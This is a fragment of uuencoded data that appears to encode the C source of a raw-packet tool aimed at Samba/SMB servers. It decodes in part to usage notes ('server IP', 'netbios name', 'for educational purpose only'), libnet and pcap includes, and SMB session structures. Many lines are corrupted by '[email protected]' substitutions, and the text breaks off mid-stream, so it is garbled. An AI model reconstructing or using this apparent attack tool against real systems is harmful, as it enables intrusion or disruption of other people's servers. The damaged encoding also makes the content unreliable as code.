M="`Z(%[email protected]+7,@(G-E<G9E<B!)4"(@[email protected](EEO=7(@;F5T8FEO<R!N
M86UE(BX-"@T*(G-E<G9E<B!)4"(@:7,@=&AE($E0(&%D9')E<W,@;[email protected]=&AE
M('[email protected]>6]U('=A;G0N("AL97-S('[email protected],[email protected]<F%C=&5R<RD-"@T*
M4W5C8V5S<V9U;&QY('1E<W1E9"!W:71H('-A;6)A('-E<G9E<B`R+C`@[email protected]*
M#0I9;[email protected]<VAO=6QD;B=T('5S92!I="!O;B!T:&[email protected];&]O<&)[email protected]:6YT97)F
[email protected]*#0I4:&ES('!R;[email protected]&]E<VXG="!S=7!P;W)T(%5.24-/[email protected]
M0V][email protected]@;&5D:6X-"B`@("`@("`@("`@("`@("`@("`@("`@;&5D:6Y`
M<B!E9'5C871I;VYA;"!P=7)P;W-E(&]N;'[email protected](0T**BHJ*BHJ*BHJ*BHJ*BHJ
M=&0N:#X-"B-I;F-L=61E(#QE<G)N;RYH/@T*(VEN8VQU9&[email protected]/'-I9VYA;"YH
M/@T*(VEN8VQU9&[email protected]/'-Y<R]I;V-T;"YH/@T*(VEN8VQU9&[email protected]/'-Y<R]T:6UE
[email protected]^#0HC:6YC;'5D92`\<WES+W=A:70N:#X-"B-I;F-L=61E(#QS>7,O<W1A
M="YH/@T*#0HC:6YC;'5D92`\;[email protected]^#0HC:6YC;'5D92`\<WES+W-O
M8VME="YH/@T*(VEN8VQU9&[email protected]/&%R<&$O:6YE="YH/@T*#0HC:6YC;'5D92`\
M;F5T:6YE="]I<"YH/@T*(VEN8VQU9&[email protected]/&YE=&EN970O:6XN:#X-"B-I;F-L
M=61E(#QN971I;F5T+W1C<"YH/@T*(VEN8VQU9&[email protected]/&YE=&[email protected]^
M;&EB;[email protected]^#0HC:6YC;'5D92`\<&-A<"YH/@T*#0HC9&5F:6YE(%--0E]0
M(V1E9FEN90EU7VEN=#$V7W0)=6YS:[email protected]<VAO<G0-"@T*(V1E9FEN90EU
M7VEN=#,R7W0)=6YS:[email protected]:6YT(`T*#0HC9&5F:6YE"75C:&%R"75N<VEG
M<R!A;[email protected];&%N;6%N(&-L:65N="[email protected]]R('5S(#[email protected]>"Y386UB82HO#0H-
M"B-D969I;[email protected]%4259%7T][email protected]'@U-5QX-F5<>#8Y7'@W.%QX
M,#!<>#4S7'@V,5QX-F1<#0I<>#8R7'@V,2(-"@T*+RI4:&[email protected]]M;6%N9"!F
M;W(@=&-O;[email protected]@<V-A;FYI;F<@.B`B/S\_/S\B*B\-"@T*(V1E9FEN92!40T].
M,V9<>#-F(B`-"@T*#0HO*E1H92!205`@8V]M;6%N9"!A;[email protected]=&AE(%Q0:7!E
M*BHJ*BHO"0D)("`@("`-"G1Y<&[email protected]<W1R=6-T#0I[#[email protected]=5]I;[email protected]
M4')O=&]C;VQ;-%T["2\J0V]N=&%I;G,@,'A&1BPG4TU")RHO#[email protected]=5]I;G0X
[email protected]]M;6%N9#L)+RI#;VUM86YD($-O9&4J+PT*('5N:6]N(`T*('L-"B`@
M<W1R=6-T#[email protected]('L-"B`@('5?:6YT.%]T($5R<F]R0VQA<W,["2\J17)R;W(@
M0VQA<W,J+PT*("`@=5]I;[email protected])V960["2\J4F5S97)[email protected]]R
M"2\J,S(M8FET<R!E<G)O<B!C;V1E*B\-"B!](%-T871U<R`[#[email protected]=5]I;G0X
[email protected],["2\J1FQA9W,J+PT*('5?:6YT.%]T($9L86=S,ELR73L)+RI-
M;W)E($9L86=S*B\-"B!U;FEO;@T*('L-"B`@=5]I;[email protected]&%D6S$R73L-
M"B`@<W1R=6-T#[email protected]('L-"B`@('5?:6YT.%]T(%!I9$AI9VA;,ET["2\J2&EG
M:"!087)T(&]F('1H92!0:60J+PT*("`@=5]I;[email protected]<V5D6S1=.PDO
M960J+PT*("!]($5X=')A.PT*('[email protected]&%D17AT<F$[#[email protected]=5]I;[email protected]&ED
M6S)=.PDO*[email protected];G1I9FEE<BHO#[email protected]=5]I;[email protected]&ED6S)=.PDO
M;F%U=&AE;G1I8V%[email protected]=7-E<B!)1"HO#[email protected]=5]I;[email protected])=.PDO
M<FET>4UO9&4["2\J4V5C=7)I='[email protected]]D92`Z*B\-"@D)"2\J8FET(#`@.B`P
M/7-H87)E+"`Q/75S97(J+PT*"0D)+RIB:[email protected],2`Z(#$]96YC<GEP="!P87-S
M;F<@;75L=&EP;&[email protected]<F5Q=65S="HO#[email protected]=5]I;[email protected]%X3G5M8F5R
M<U9C<ULR73LO*DUA>"!60W,@[email protected](&%N9"!S97)V97(J
M+PT*('5?:6YT.%]T($UA>$)U9F9E<E-I>F5;-%T[[email protected]@=')A;G-M:[email protected]
M8G5F9F5R('-I>F4J+PT*('5?:6YT.%]T($UA>%)A=U-I>F5;-%T[[email protected]@
M56YI<75E('1O:V5N(&ED96YT:69Y:6YG('1H:7,@<V5S<VEO;BHO#[email protected]=5]I
M;[email protected]%P86)I;&ET:65S6S1=.R\J4V5R=F5R($-A<&%B:6QI=&EE<RHO
M#[email protected]=5]I;[email protected]=&5M5&EM94QO=ULT73LO*E-Y<W1E;2`H551#*2!T
M;65(:6=H6S1=.R\J4WES=&5M("A55$,I('1I;[email protected];[email protected]=&AE('-E<G9E<B`H
M;VYE(&]F('-E<G9E<B`H;6EN(&9R;[email protected]#*2HO#[email protected]=5]I;[email protected]
M#[email protected]=5]I;[email protected]=6YT6S)=.PDO*D-O=6YT(&]F(&1A=&[email protected]
M="`-"GL-"B!U7VEN=#A?="!7;W)D0V]U;G0[#[email protected]=5]I;[email protected]
M=6YT6S)=.PT*('5?:6YT.%]T($)U9F9E<D9O<FUA=#L-"[email protected]')O
M=%)E<75E<W1(9'([(`T*#0H-"G1Y<&[email protected]<W1R=6-T#0I[#[email protected]=5]I;G0X
[email protected]]R9$-O=6YT.R\J0V]U;[email protected];[email protected]<&%R86UE=&5R('=O<F1S/3$S("AR
M97%U97-T*2HO#[email protected]=5]I;[email protected]$-O;6UA;F0[+RIS96-O;F1A<[email protected]
M;F183V9F<V5T6S)=.R\J;V9F<V5T('1O(&YE>'[email protected]]M;6%N9"!7;W)D8V]U
M="HO#[email protected]=5]I;[email protected]=6UB97);,ET[+RHP/69I<G-T("AO;FQY*[email protected]